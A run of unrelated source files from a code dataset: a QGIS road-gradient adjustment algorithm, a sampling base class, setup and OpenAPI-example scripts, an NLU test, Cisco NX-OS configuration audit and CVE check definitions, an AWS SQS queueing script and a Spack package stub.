* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
v2.11 16 Jan 2021
Fixed line 267 ZeroDivisionError
"""
__author__ = '<NAME>'
__date__ = 'Nov 2020'
__copyright__ = '(C) 2020, <NAME> Hai'
from qgis.PyQt.QtCore import QCoreApplication, QVariant
from qgis.core import (QgsProcessing,
QgsProcessingAlgorithm,
QgsProcessingContext,
QgsProcessingException,
QgsProcessingParameterBoolean,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterNumber,
QgsProcessingParameterString,
QgsProcessingParameterVectorDestination,
QgsProcessingUtils,
QgsProcessingException,
QgsFeatureSink,
)
from qgis import processing
from qgis.core import (
QgsFeature,QgsField, QgsFields,
QgsGeometry, QgsGeometryUtils,
QgsProject, QgsProperty, QgsVectorLayer,
QgsExpressionContextUtils,
QgsLineSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsSpatialIndex,
QgsVertexId,
QgsGeometryUtils )
class AdjustGradient(QgsProcessingAlgorithm):
    """QGIS processing algorithm: cap road-segment gradients at an input limit.

    Takes a Segmentz line layer (with a 'grad' field) and a Nodez point layer,
    lowers end-node elevations of segments steeper than 1:GRADLIM, propagates
    the change to connected segments, and writes adjusted Node/Segment sinks.
    """
    INPUT = 'INPUT'
    INPUT2 = 'INPUT2'
    GRADLIM = 'GRADLIM'
    AUTONAME = 'AUTONAME'
    VISOFF = 'VISOFF'
    OUTPUT = 'OUTPUT'
    OUTPUT2 = 'OUTPUT2'
    def createInstance(self):
        # Required by the QGIS processing framework.
        return AdjustGradient()
    def name(self):
        # Internal algorithm id (lowercase, no spaces).
        return 'adjustgradient'
    def displayName(self):
        return ('Adjust segment gradient')
    def group(self):
        return ('IMP Tools')
    def groupId(self):
        return 'imp'
    def shortHelpString(self):
        return ('Adjust all road segment gradients and junction node elevations'
                '\n'
                'Adjust all road segment gradients to be not steeper than the input value. '
                'Z values of segment endpoints and intermediate vertices are adjusted in the output layer. '
                'Z values of nodes around adjusted segments are also adjusted in the output layer. '
                '\n'
                'The input Segmentz map layer must have a grad field.'
                '\n'
                'The algorithm works by adjusting the steepest segment down to the input steepness value. '
                'Connected segments are then adjusted. '
                'Following that, the algorithm adjusts the next steepest unconnected segment. '
                '\n'
                'If there are still steep segments after the algorithm have passed through all segments, the process is repeated. '
                'A maximum of three iterations has been coded in the algorithm.'
                )
    def initAlgorithm(self, config=None):
        """Declare the two input layers, the gradient limit and the two sinks."""
        self.addParameter(QgsProcessingParameterVectorLayer(
            self.INPUT,'INPUT: Segment',
            [QgsProcessing.TypeVectorLine],'Segmentz' ) )
        self.addParameter(QgsProcessingParameterVectorLayer(
            self.INPUT2,'INPUT2: Node',
            [QgsProcessing.TypeVectorPoint],'Nodez' ) )
        self.addParameter(QgsProcessingParameterNumber(
            self.GRADLIM,'Not steeper than 1:' ,
            defaultValue= 25) )
        self.addParameter(QgsProcessingParameterBoolean(
            self.AUTONAME,'Output auto naming ',
            defaultValue=True))
        self.addParameter(QgsProcessingParameterBoolean(
            self.VISOFF,'Turn off other layers ',
            defaultValue=True))
        self.addParameter(QgsProcessingParameterFeatureSink(
            self.OUTPUT,'Node_adjusted',
            QgsProcessing.TypeVectorAnyGeometry ) )
        self.addParameter(QgsProcessingParameterFeatureSink(
            self.OUTPUT2,'Segment_adjusted',
            QgsProcessing.TypeVectorAnyGeometry ) )
    def processAlgorithm(self, parameters, context, feedback):
        """Adjust node elevations and segment gradients; fill both output sinks."""
        # Hard cap on whole-network passes (also documented in the help text).
        maxitera = 3 # maximum number of iterations (repeat for all segments)
        seglay = self.parameterAsVectorLayer(parameters, self.INPUT, context)
        if seglay is None:
            raise QgsProcessingException(self.InvalidSourceError(parameters, self.INPUT))
        nodelay = self.parameterAsVectorLayer(parameters, self.INPUT2, context)
        if nodelay is None:
            raise QgsProcessingException(self.InvalidSourceError(parameters, self.INPUT2))
        self.gradlim = self.parameterAsInt(parameters, self.GRADLIM, context)
        if self.gradlim is None:
            raise QgsProcessingException(self.InvalidSourceError(parameters, self.gradlim))
        autonaming = self.parameterAsBoolean( parameters, self.AUTONAME, context )
        visibleoff = self.parameterAsBoolean( parameters, self.VISOFF, context )
        # Node_adjusted output
        newfields = QgsFields()
        newfields.append(QgsField('id', QVariant.Int))
        newfields.append(QgsField('z', QVariant.Double))
        newfields.append(QgsField('oldz', QVariant.Double))
        newfields.append(QgsField('adj', QVariant.Double))
        (sink, self.dest_id) = self.parameterAsSink(
            parameters,
            self.OUTPUT,
            context,
            newfields,
            1001, # PointZ wkbType
            nodelay.sourceCrs()
        )
        # Segment_adjusted output
        newfields = QgsFields()
        newfields.append(QgsField('lid', QVariant.Int))
        newfields.append(QgsField('wid', QVariant.Double))
        newfields.append(QgsField('grad', QVariant.Double))
        newfields.append(QgsField('styl', QVariant.Int))
        newfields.append(QgsField('oldgrad', QVariant.Double))
        (sink2, self.dest_id2) = self.parameterAsSink(
            parameters,
            self.OUTPUT2,
            context,
            newfields,
            1002, # LineStringZ wkbType
            seglay.sourceCrs()
        )
        # visible off
        if visibleoff:
            r = QgsProject.instance().layerTreeRoot()
            layers = r.checkedLayers()
            for lay in layers:
                r.findLayer(lay.id()).setItemVisibilityChecked(False)
        # Store into memory
        # d_idz maps node feature id -> elevation (z).
        d_idz={}
        for f in nodelay.getFeatures():
            id=f.id()
            try:
                z=f['z']
            except:
                raise QgsProcessingException('Error! Field: z not found in input node layer')
            d_idz[id]=z
        # Per-segment lookup tables keyed by the 'lid' field:
        # grad (current), length, start/end node ids, plus a working copy of
        # grads (d_lidgradwkg) that is consumed as segments get adjusted.
        d_lidgrad={}
        d_lidleng={}
        lislidwkg=[]
        d_lidgradwkg={}
        d_lideid={}
        d_lidsid={}
        index = QgsSpatialIndex(nodelay.getFeatures())
        for f in seglay.getFeatures():
            lid=f['lid']
            try:
                grad=f['grad']
            except:
                raise QgsProcessingException('Error! Field: grad not found in input segment layer')
            # NULL/0 grad is treated as "flat": sentinel 9999 means 1:9999.
            if not grad:
                grad=9999
            d_lidgrad[lid]=grad
            lislidwkg.append(lid)
            d_lidgradwkg[lid]=grad
            # Snap each segment endpoint to its nearest node to get its id/z.
            lin = f.geometry().constGet()
            pgeom = QgsGeometry(lin[0])
            nearest = index.nearestNeighbor(pgeom, 1)
            sid = nearest[0]
            sz = d_idz[sid]
            pgeom = QgsGeometry(lin[-1])
            nearest = index.nearestNeighbor(pgeom, 1)
            eid = nearest[0]
            ez = d_idz[eid]
            d_lidleng[lid]=f.geometry().constGet().length()
            d_lidsid[lid]=sid
            d_lideid[lid]=eid
        # adjust next (steepest)
        # Smaller grad ratio (1:N) means steeper, so min() picks the steepest
        # remaining segment each pass.
        for itera in range(0,maxitera):
            for lid in lislidwkg:
                lid = min(d_lidgradwkg, key=d_lidgradwkg.get)
                # Steepest remaining segment already satisfies the limit:
                # nothing left to adjust in this iteration.
                if d_lidgrad[lid] > self.gradlim:
                    break
                d_lidgradwkg.pop(lid)
                leng = d_lidleng[lid]
                grad = d_lidgrad[lid]
                # ej: (negative) elevation change needed at the end node to
                # bring this segment down to exactly 1:gradlim.
                ej = round( -(leng/grad - leng/self.gradlim),1)
                eid = d_lideid[lid]
                ez = d_idz[eid]
                sid = d_lidsid[lid]
                sz = d_idz[sid]
                # NOTE(review): the comment says "skip", but break exits the
                # whole inner pass rather than continuing with the next
                # steepest segment -- confirm a `continue` was not intended.
                if ez<sz: # skip adjusting ez down if ez<sz
                    break
                ezj = round((ez + ej),1)
                # Guard against division by zero when the adjusted end equals
                # the start elevation (the v2.11 ZeroDivisionError fix).
                if ezj==sz:
                    ng = 9999
                else:
                    newgrad = abs(leng/(ezj-sz))
                    ng = round(newgrad,1)
                d_lidgrad[lid]=ng
                # update d_idz
                d_idz[eid]=ezj
                # update grad of connected segments
                lidlisteid = [l for l,i in d_lideid.items() if i == eid]
                lidlistsid = [l for l,i in d_lidsid.items() if i == eid]
                lidlist = lidlisteid + lidlistsid
                lidlist = list(dict.fromkeys(lidlist))
                lidlist.remove(lid)
                # print('lid',lid,'eid',eid,'connected lid\n',lidlist)
                for lid in lidlist:
                    eid = d_lideid[lid]
                    sid = d_lidsid[lid]
                    ez = d_idz[eid]
                    sz = d_idz[sid]
                    leng = d_lidleng[lid]
                    oldgrad = d_lidgrad[lid]
                    if ez==sz:
                        newgrad=9999
                    else:
                        newgrad = abs(leng/(ez-sz))
                    d_lidgrad[lid] = round(newgrad,1)
            # refill dict for next iteration
            d_lidgradwkg = d_lidgrad.copy()
        # adjust
        # Rewrite each segment's geometry with the new Z values and emit the
        # Segment_adjusted feature (styl encodes how it should be rendered).
        for f in seglay.getFeatures():
            geom = f.geometry()
            lin = geom.constGet()
            lid = f['lid']
            wid = f['wid']
            leng = lin.length()
            eid = d_lideid[lid]
            ez = d_idz[eid]
            sid = d_lidsid[lid]
            sz = d_idz[sid]
            # reverse if ez<sz
            if ez<sz:
                # workaround to overcome Qgis crashing
                geom=QgsGeometry(lin.reversed())
                lin = geom.constGet()
                temp = eid
                eid = sid
                sid = temp
                d_lideid[lid] = eid
                d_lidsid[lid] = sid
                temp = ez
                ez = sz
                sz = temp
            # insert z into vertices
            lin.dropZValue()
            lin.addZValue(0)
            lin.setZAt(0,sz)
            lin.setZAt(-1,ez)
            n = lin.numPoints()
            if n > 2:
                # Interpolate Z linearly along the segment for interior vertices.
                for i in range(1,n-1):
                    v = QgsVertexId(0,0,i)
                    d = QgsGeometryUtils.distanceToVertex(lin,v)
                    z = d/leng * (ez-sz) + sz
                    lin.setZAt(i,z)
            seglay.changeGeometry(f.id(), geom)
            oldgrad = f['grad']
            if not oldgrad:
                oldgrad = 9999
            grad = d_lidgrad[lid]
            # styl: 1 = still steeper than the limit, 2 = changed, 0 = untouched.
            if grad<(self.gradlim-0.5):
                styl = 1
            elif grad!=oldgrad:
                styl = 2
            else:
                styl = 0
            if grad>50:
                grad = round(grad,0)
            if oldgrad>50:
                oldgrad = round(oldgrad,0)
            g = QgsFeature()
            g.setGeometry(geom)
            g.setAttributes([lid,wid, grad,styl,oldgrad])
            sink2.addFeature(g, QgsFeatureSink.FastInsert)
        # Emit the Node_adjusted features, reporting each changed elevation.
        i=0
        feedback.pushInfo( '\n####################################\n' )
        for f in nodelay.getFeatures():
            id = f.id()
            oldz = f['z']
            z = d_idz[id]
            adj = round( (oldz - z), 1 )
            if adj !=0:
                feedback.pushInfo( 'Node {} elevation adjusted {} meters'.format(id,adj) )
                i+=1
            geom = f.geometry()
            p = geom.constGet()
            p.setZ(z)
            g = QgsFeature()
            g.setGeometry(geom)
            g.setAttributes([id,z,oldz,adj])
            sink.addFeature(g, QgsFeatureSink.FastInsert)
        feedback.pushInfo( '\nSEGMENTS AND ' + str(i) + ' NODES ADJUSTED' )
        feedback.pushInfo( '\n\nOshAdjustGradient.py v2.11\n'
                           '####################################\n\n' )
        if autonaming:
            # Name the loaded layers after the gradient limit, e.g. Node_25.
            nodename = 'Node_' + str(self.gradlim)
            segname = 'Segment_' + str(self.gradlim)
            context.addLayerToLoadOnCompletion(self.dest_id,context.LayerDetails(
                name=nodename,project=context.project() ))
            context.addLayerToLoadOnCompletion(self.dest_id2,context.LayerDetails(
                name=segname,project=context.project() ))
        return {self.OUTPUT: self.dest_id, self.OUTPUT2: self.dest_id2}
    def postProcessAlgorithm(self, context, feedback):
        """Apply the saved QML styles and build a renderer for the grad limit."""
        project = QgsProject.instance()
        scope = QgsExpressionContextUtils.projectScope(project)
        projfold = scope.variable('project_folder')
        # NOTE(review): Windows-style '\\' separators -- these QML paths will
        # not resolve on POSIX; confirm the plugin targets Windows only.
        nodeqml = projfold + '\\qsettings\\Node_adjusted.qml'
        segqml = projfold + '\\qsettings\\Segment_adjusted.qml'
        layer2 = QgsProcessingUtils.mapLayerFromString(self.dest_id, context)
        layer2.loadNamedStyle(nodeqml)
        layer3 = QgsProcessingUtils.mapLayerFromString(self.dest_id2, context)
        layer3.loadNamedStyle(segqml)
        # necessary to customize categories based on self.gradlim input
        # default style is only for self.gradlim = 25
        catren = QgsCategorizedSymbolRenderer()
        catren.setClassAttribute('styl')
        linsym1 = QgsLineSymbol.createSimple( {'width':'1','color':'pink'} )
        linsym2 = QgsLineSymbol.createSimple( {'width':'.8','color':'green'} )
        linsym3 = QgsLineSymbol.createSimple( {'width':'.1','color':'blue'} )
        exp1 = 'grad<'+str(self.gradlim-0.5)
        exp2 = 'grad changed'
        cat1 = QgsRendererCategory('1', linsym1, exp1)
        cat2 = QgsRendererCategory('2', linsym2, exp2)
        cat3 = QgsRendererCategory('0', linsym3, '')
        catren.addCategory(cat1)
        catren.addCategory(cat2)
        catren.addCategory(cat3)
        layer3.setRenderer(catren)
        layer3.triggerRepaint()
        return {self.OUTPUT: self.dest_id, self.OUTPUT2: self.dest_id2}
| 1.492188 | 1 |
high_dimensional_sampling/procedures.py | williamjameshandley/high-dimensional-sampling | 0 | 12769682 | <reponame>williamjameshandley/high-dimensional-sampling
from abc import ABC, abstractmethod
class Procedure(ABC):
    """Abstract base class for all sampling procedures.

    Every sampling procedure subjected to an experiment must derive from this
    class and implement __init__, __call__, is_finished and reset. Being an
    abstract base class, Procedure itself cannot be instantiated.
    """

    @abstractmethod
    def __init__(self):
        """Initialise the procedure.

        Subclasses may take any (defaulted) arguments, but must always define
        a ``store_parameters`` attribute listing the configuration parameter
        names to be logged at the start of an experiment. When a procedure has
        no such parameters, the list is simply empty, as here.
        """
        self.store_parameters = []

    @abstractmethod
    def __call__(self, function):
        """Sample one or more new data points from *function*.

        Args:
            function: a TestFunction-derived instance; ``function(data)``
                returns values and ``function(data, True)`` derivatives.

        Returns:
            x: sampled points, numpy.ndarray of shape (nDatapoints, nVariables).
            y: function values at those points, shape (nDatapoints, ?).
        """
        raise NotImplementedError

    @abstractmethod
    def is_finished(self):
        """Report whether sampling has converged / should stop.

        Called at every iteration of an Experiment; returning True stops the
        experiment in which this procedure is being tested.
        """
        raise NotImplementedError

    @abstractmethod
    def reset(self):
        """Restore all internal settings to their defaults."""
        raise NotImplementedError
| 3.546875 | 4 |
setup.py | JevexEndo/qtdesign6 | 0 | 12769683 | import codecs
import os.path
import setuptools
# Load the PyPI long description from the README shipped with the package.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
def read(rel_path):
    """Return the text content of *rel_path*, resolved relative to this file."""
    base_dir = os.path.abspath(os.path.dirname(__file__))
    with codecs.open(os.path.join(base_dir, rel_path), "r") as handle:
        return handle.read()
def get_version(rel_path):
    """Extract the version from a ``__version__ = "..."`` line in *rel_path*.

    Handles both single- and double-quoted assignments; raises RuntimeError
    when no ``__version__`` line is found.
    """
    for line in read(rel_path).splitlines():
        if line.startswith("__version__"):
            quote = '"' if '"' in line else "'"
            return line.split(quote)[1]
    raise RuntimeError("Unable to find version string.")
setuptools.setup(
    name="QtDesign6",
    # Bug fix: the original path used Windows-only backslashes
    # ("src\\QtDesign6\\__init__.py"), which are literal filename characters
    # on POSIX, so installing from source failed on Linux/macOS. Forward
    # slashes work on every platform.
    version=get_version("src/QtDesign6/__init__.py"),
    author="Jevex",
    author_email="<EMAIL>",
    description="Custom widgets and utilities for PySide6",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/JevexEndo/qtdesign6",
    project_urls={
        "Bug Tracker": "https://github.com/JevexEndo/qtdesign6/issues",
    },
    classifiers=[
        # Bug fix: trailing space removed -- classifiers must match the PyPI
        # trove list exactly, otherwise the upload is rejected.
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
    ],
    package_dir={"": "src"},
    packages=setuptools.find_packages(where="src"),
    python_requires=">=3.8",
)
| 1.742188 | 2 |
scripts/inline_examples.py | NHSDigital/fhir-converter | 0 | 12769684 | #!/usr/bin/env python
import json
import os
import sys
from jsonpath_ng import parse
from lxml import etree
SPEC_DIR = f"{os.path.dirname(os.path.realpath(__file__))}/../specification"
def main(file: str):
    """Load an OpenAPI spec and inline its request/response example files."""
    with open(file, 'r') as spec_file:
        spec = json.load(spec_file)

    request_refs = parse("$.paths.['/$convert'].post.requestBody.content.*.examples.*.['$ref']").find(spec)
    inline_examples(spec, request_refs)

    response_refs = parse("$.paths.['/$convert'].post.responses.*.content.*.examples.*.['$ref']").find(spec)
    inline_examples(spec, response_refs)

    # Emit the fully inlined spec on stdout.
    print(json.dumps(spec))
def inline_examples(spec, examples_path):
    """Replace each matched example ``$ref`` with its file content in *spec*."""
    for found in examples_path:
        ref = found.full_path
        file_content = read_example_from_component(spec, ref)
        # Overwrite the parent of the $ref with an inline {"value": ...}.
        ref.left.update(spec, {"value": file_content})
def read_example_from_component(spec: dict, path):
    """Resolve a component ``$ref`` to its example file content.

    XML files are returned pretty-printed, JSON files verbatim; any other
    extension yields None (implicitly), matching the previous behaviour.
    """
    component = path.find(spec)[0].value
    # Turn "#/components/..." into a dotted JSONPath into the spec.
    com_path = component.replace("#/", "").replace("/", ".")
    match = parse(f"$.{com_path}.value.['$ref']").find(spec)[0].value
    if match.endswith(".xml"):
        with open(f"{SPEC_DIR}/{match}", "r") as example_content:
            return pretty_print_xml(example_content)
    if match.endswith(".json"):
        with open(f"{SPEC_DIR}/{match}", "r") as example_content:
            return example_content.read()
def pretty_print_xml(content):
    """Parse an XML file object and return it pretty-printed as a string."""
    tree = etree.parse(content)
    return etree.tostring(tree, pretty_print=True, encoding=str)
if __name__ == '__main__':
    # CLI entry point: argv[1] is the path of the spec file to process.
    main(sys.argv[1])
| 2.734375 | 3 |
csc_checks.py | mvollandt/csc | 1 | 12769685 | # filename : csc_checks.py
# description : check definitions (security best practices and CVEs)
# create date : 2018-05-07 14:07:33.569768
# Every check dict shared the same result strings and fix placeholder, so the
# ~10-line literals are built through one factory instead of being repeated 26
# times. All public names and dict values are unchanged (except two typo fixes
# in display strings, noted inline). Regex patterns use raw strings: identical
# values, but no invalid-escape-sequence warnings on modern Python.
def _check(check_name, check_type, match1, info,
           match2='n/a', required='yes', url='n/a'):
    """Build one check-definition dict.

    Args:
        check_name: unique identifier (mirrors the module-level variable name).
        check_type: matching routine selector -- 'check_in_simple',
            'check_parameter' or 'check_two_parameters'.
        match1: first pattern (literal or regex) looked up in the config.
        info: human-readable description shown with the result.
        match2: second pattern for (two-)parameter checks; 'n/a' when unused.
        required: 'yes' if the pattern must be present, 'no' if flagged when found.
        url: reference URL (CVE advisory) or 'n/a'.
    """
    return {'check_name': check_name,
            'check_type': check_type,
            'match1': match1,
            'match2': match2,
            'required': required,
            'result_ok': 'Test successful.',
            'result_failed': 'Test failed.',
            'info': info,
            'url': url,
            'fix': 'Command to fix'}

# --- Security best-practice checks (NX-OS hardening) -------------------------
csc1_1 = _check('csc1_1', 'check_in_simple', 'banner motd',
                'A banner should be set')  # typo fix: "shoud" -> "should"
csc1_2 = _check('csc1_2', 'check_in_simple', 'no cdp enable',
                'CDP should not be enabled globally')
csc1_3 = _check('csc1_3', 'check_in_simple', 'snmpv1',
                'SNMP version 1 should not be configured', required='no')
csc1_4 = _check('csc1_4', 'check_in_simple',
                r'snmp-server host \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} traps version 2c',
                'SNMP version 2c ')
csc1_5 = _check('csc1_5', 'check_parameter', 'ssh key rsa',
                'RSA key length [2048]', match2='2048')
# NOTE(review): csc1_6 duplicates csc1_16's pattern and its info string looks
# copy-pasted from csc1_7 -- confirm the intended description before changing.
csc1_6 = _check('csc1_6', 'check_in_simple', 'no ssh key dsa',
                'SNMP source interface [mgmt0]')
csc1_7 = _check('csc1_7', 'check_parameter', 'snmp-server source-interface traps',
                'SNMP source interface [mgmt0]', match2='mgmt0')
csc1_8 = _check('csc1_8', 'check_parameter', 'snmp-server location',
                'SNMP location string', match2='FR.*')
csc1_9 = _check('csc1_9', 'check_parameter', 'snmp-server host',
                'SNMP destination server',
                match2=r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
csc1_10 = _check('csc1_10', 'check_parameter', 'snmp-server community',
                 'SNMP community string', match2='your_community_string_here')
csc1_11 = _check('csc1_11', 'check_parameter', 'ntp server',
                 'NTP server have to be configured',
                 match2=r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
csc1_12 = _check('csc1_12', 'check_parameter', 'ntp source-interface',
                 'NTP source interface [mgmt0]', match2='mgmt0')
csc1_13 = _check('csc1_13', 'check_in_simple', 'no feature telnet',
                 'no feature telnet')
csc1_14 = _check('csc1_14', 'check_in_simple', 'password strength-check',
                 'password strength-check')
csc1_15 = _check('csc1_15', 'check_in_simple', 'password secure-mode',
                 'password secure-mode')
csc1_16 = _check('csc1_16', 'check_in_simple', 'no ssh key dsa',
                 'no ssh key dsa')
csc1_17 = _check('csc1_17', 'check_in_simple', 'aaa authentication login default group',
                 'aaa authentication login default group')
csc1_18 = _check('csc1_18', 'check_in_simple', 'aaa authentication login console group',
                 'aaa authentication login console group')
csc1_19 = _check('csc1_19', 'check_in_simple', 'no ip source-route',
                 'no ip source-route')
csc1_20 = _check('csc1_20', 'check_in_simple', 'no ip igmp snooping',
                 'no ip igmp snooping')
# typo fix: "axec" -> "exec". NOTE(review): NX-OS exec-timeout is in minutes,
# not seconds -- confirm the "15s" wording.
csc1_21 = _check('csc1_21', 'check_in_simple', 'exec-timeout 15',
                 'minimize exec timeout to 15s')

# --- CVE checks ---------------------------------------------------------------
CVE_2018_0102 = _check('CVE_2018_0102', 'check_two_parameters', 'feature pong',
                       'Affected versions: 7.2(2)d1(1), 7.2(2)d1(2), 7.2(1)d(1)',
                       match2='feature-set fabricpath', required='no',
                       url='https://www.cvedetails.com/cve/CVE-2018-0102/')
CVE_2018_0090 = _check('CVE_2018_0090', 'check_two_parameters',
                       'cisco Nexus(20|30|55|56|60|70|77)00',
                       'Affected versions: 7.3(2)n1(0.6), 8.3(0)kms(0.31), 8.8(3.5)s0',
                       match2='access-list', required='no',
                       url='https://www.cvedetails.com/cve/CVE-2018-0090/')
CVE_2018_0092 = _check('CVE_2018_0092', 'check_two_parameters',
                       'cisco Nexus(30|36|90|95)00',
                       'Affected versions: 7.0(3)i5(2), 7.0(3)i6(1), 7.0(3)i7(1)',
                       match2='role network-operator',
                       url='https://www.cvedetails.com/cve/CVE-2018-0092/')
CVE_2017_12341 = _check('CVE_2017_12341', 'check_in_simple',
                        r'8.1\(1\)|8.2\(1\)|8.1\(0.59\)s0',
                        'Affected versions: 8.1(1), 8.2(1), 8.1(0.59)s0',
                        required='no',
                        url='https://www.cvedetails.com/cve/CVE-2017-12341/')
CVE_2017_12331 = _check('CVE_2017_12331', 'check_two_parameters',
                        'cisco Nexus(70|77)00',
                        'Affected versions: 8.1(1)',
                        match2=r'8.1\(1\)', required='no',
                        url='https://www.cvedetails.com/cve/CVE-2017-12331/')
| 1.640625 | 2 |
Albedo/AlbedoPh1Queue.py | bradrubin/PycharmProjects | 0 | 12769686 | bucketName = 'org.cicsnc.albedo'
basePath = 'Input/area/'  # S3 key prefix holding the area files
satellite = 'goes13'      # file-name prefix to queue (filtered via startswith)
year = '2017'             # four-digit year compared against chars 7:11 of each name
startDay = 1              # first day-of-year to include (inclusive)
endDay = 10               # last day-of-year to include (inclusive)
filterBand = 'BAND_01'    # only names ending in this band suffix are queued
dryrun = False            # True: print the selection only, do not enqueue to SQS
import re
from os import fdopen, remove
from shutil import move
from tempfile import mkstemp
import boto3
def replace(file_path, pattern, subst):
    """Rewrite *file_path* in place, applying re.sub(pattern, subst) per line.

    The result is written to a temporary file first, then moved over the
    original, so a partially written file never replaces the source.
    """
    tmp_fd, tmp_path = mkstemp()
    with fdopen(tmp_fd, 'w') as out_file, open(file_path) as in_file:
        for line in in_file:
            out_file.write(re.sub(pattern, subst, line))
    remove(file_path)
    move(tmp_path, file_path)
def removePrefix(text, prefix):
    """Return *text* with *prefix* stripped from the front, if present."""
    if text.startswith(prefix):
        return text[len(prefix):]
    return text
def getS3FileNames(bucket, folder):
    """List every object key under *folder* in *bucket*, following pagination.

    Uses the module-level boto3 ``s3`` client. As in the original, an empty
    listing raises KeyError ('Contents' absent from the response).
    """
    keys = []
    request = {'Bucket': bucket, 'Prefix': folder}
    while True:
        resp = s3.list_objects_v2(**request)
        keys.extend(obj['Key'] for obj in resp['Contents'])
        if 'NextContinuationToken' not in resp:
            break
        request['ContinuationToken'] = resp['NextContinuationToken']
    return keys
if satellite == 'goes08' or 'goes12' or 'goes13' or 'goes14':
startTimeA = 0
endTimeA = 130
startTimeB = 730
endTimeB = 2359
replace('../ancillary.src/AlgorithmConfigurationFile_docker', 'GRIDID=GOES_..._VIS02', 'GRIDID=GOES_075_VIS02')
elif satellite == 'goes09' or 'goes10' or 'goes11' or 'goes15':
startTimeA = 0
endTimeA = 530
startTimeB = 1130
endTimeB = 2359
replace('../ancillary.src/AlgorithmConfigurationFile_docker', 'GRIDID=GOES_..._VIS02', 'GRIDID=GOES_135_VIS02')
else:
print("Invalid satellite setting")
exit(-1)
s3 = boto3.client('s3')
s3.upload_file("../ancillary.src/AlgorithmConfigurationFile_docker", bucketName, "AlgorithmConfigurationFile_docker")
fileNames = getS3FileNames(bucketName, basePath)
fileNames = map(lambda d: removePrefix(d, basePath), fileNames)[1:]
fileNames = filter(lambda f: f.startswith(satellite), fileNames)
fileNames = filter(lambda f: f.endswith(filterBand), fileNames)
fileNames = filter(lambda f: f[7:11] == year, fileNames)
days = list("%03d" % day for day in range(startDay, endDay + 1))
fileNames = [x for x in fileNames if x[12:15] in days]
timesA = list("%04d" % time for time in range(startTimeA, endTimeA + 1))
timesB = list("%04d" % time for time in range(startTimeB, endTimeB + 1))
fileNames = [x for x in fileNames if x[16:20] in timesA + timesB]
client = boto3.client('sqs', region_name='us-east-1')
queues = client.list_queues(QueueNamePrefix='AlbedoPh1')
queueURL = queues['QueueUrls'][0]
for fileName in fileNames:
print(fileName)
if not dryrun:
enqueueResponse = client.send_message(QueueUrl=queueURL, MessageBody=fileName)
print(len(fileNames))
| 1.851563 | 2 |
tests/modin/modin_tests.py | sumanthratna/nlu | 1 | 12769687 | <reponame>sumanthratna/nlu
import unittest
import pandas as pd
import numpy as np
import modin.pandas as mpd
import numpy as np
import nlu
import sparknlp
import pyspark
class MyTestCase(unittest.TestCase):
    """Smoke test: NLU sentiment prediction across Modin, pandas and Spark frames."""
    def test_print_pipe_info(self):
        # Works with both the RAY and DASK Modin backends.
        data = {"text": ['This day sucks but tomorrow will be better ! ', 'I love this day', 'I dont like Sami']}

        # Modin frame in -> Modin frame out.
        modin_frame = mpd.DataFrame(data)
        prediction = nlu.load('sentiment').predict(modin_frame)
        print(prediction)
        self.assertTrue(type(prediction) == mpd.DataFrame)

        # pandas frame in -> pandas frame out.
        pandas_frame = pd.DataFrame(data)
        prediction = nlu.load('sentiment').predict(pandas_frame)
        print(prediction)
        self.assertTrue(type(prediction) == pd.DataFrame)

        # Spark frame in -> Spark frame out.
        print('TESTING SDF')
        spark_frame = nlu.spark.createDataFrame(pandas_frame)
        prediction = nlu.load('sentiment', verbose=True).predict(spark_frame)
        self.assertTrue(type(prediction) == pyspark.sql.dataframe.DataFrame)
        prediction.show()
if __name__ == '__main__':
    # Bug fix: the module previously called MyTestCase().test_entities_config(),
    # a method that does not exist on this class (raising AttributeError at
    # runtime). Use the standard unittest entry point so all test_* methods run.
    unittest.main()
| 2.8125 | 3 |
backend/resolver/resolver.py | bb111189/Tora-Zilliqa | 0 | 12769688 | # -*- coding:utf-8 -*-
# Copyright 2019 TEEX
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from backend.dispatcher.request_dispatcher import RequestDispatcher
import time
import threading
class Resolver(threading.Thread):
    """Background thread that drains monitor queues into the request dispatcher."""

    def __init__(self, monitors, configs):
        """Store the monitors to poll and build the dispatcher from *configs*."""
        super().__init__()
        self.monitors = monitors
        self.dispatcher = RequestDispatcher(configs)

    def run(self):
        """Poll every monitor forever, dispatching each pending request.

        When a monitor has nothing queued, sleep one second before looking at
        the next one, so an idle loop does not spin the CPU.
        """
        while True:
            for monitor in self.monitors:
                pending = monitor.get_front_request()
                if pending is None:
                    time.sleep(1)
                else:
                    # Request parameters are resolved downstream by the dispatcher.
                    self.dispatcher.dispatch_request(pending)
| 2.390625 | 2 |
var/spack/repos/builtin/packages/tensorflow/package.py | electronicvisions/spack | 2 | 12769689 | from spack import *
from glob import glob
import os
class Tensorflow(Package):
    """TensorFlow is an Open Source Software Library for Machine Intelligence"""

    homepage = "https://www.tensorflow.org"
    url = "https://github.com/tensorflow/tensorflow/archive/v0.10.0.tar.gz"

    # Known releases with their md5 checksums.
    version('2.0.0-alpha0', 'a26886611105d3399c2a5985fe14d904')
    version('1.13.1', '0fd6bd88f880c1d907e0bd898b37ee1b', preferred=True)
    version('1.12.0', '48164180a2573e75f1c8dff492a550a0')
    version('1.9.0', '3426192cce0f8e070b2010e5bd5695cd')
    version('1.8.0', 'cd45874be9296644471dd43e7da3fbd0')
    version('1.6.0', '6dc60ac37e49427cd7069968da42c1ac')
    version('1.5.0', 'e087dc1f47dbbda87cf4278acddf785b')
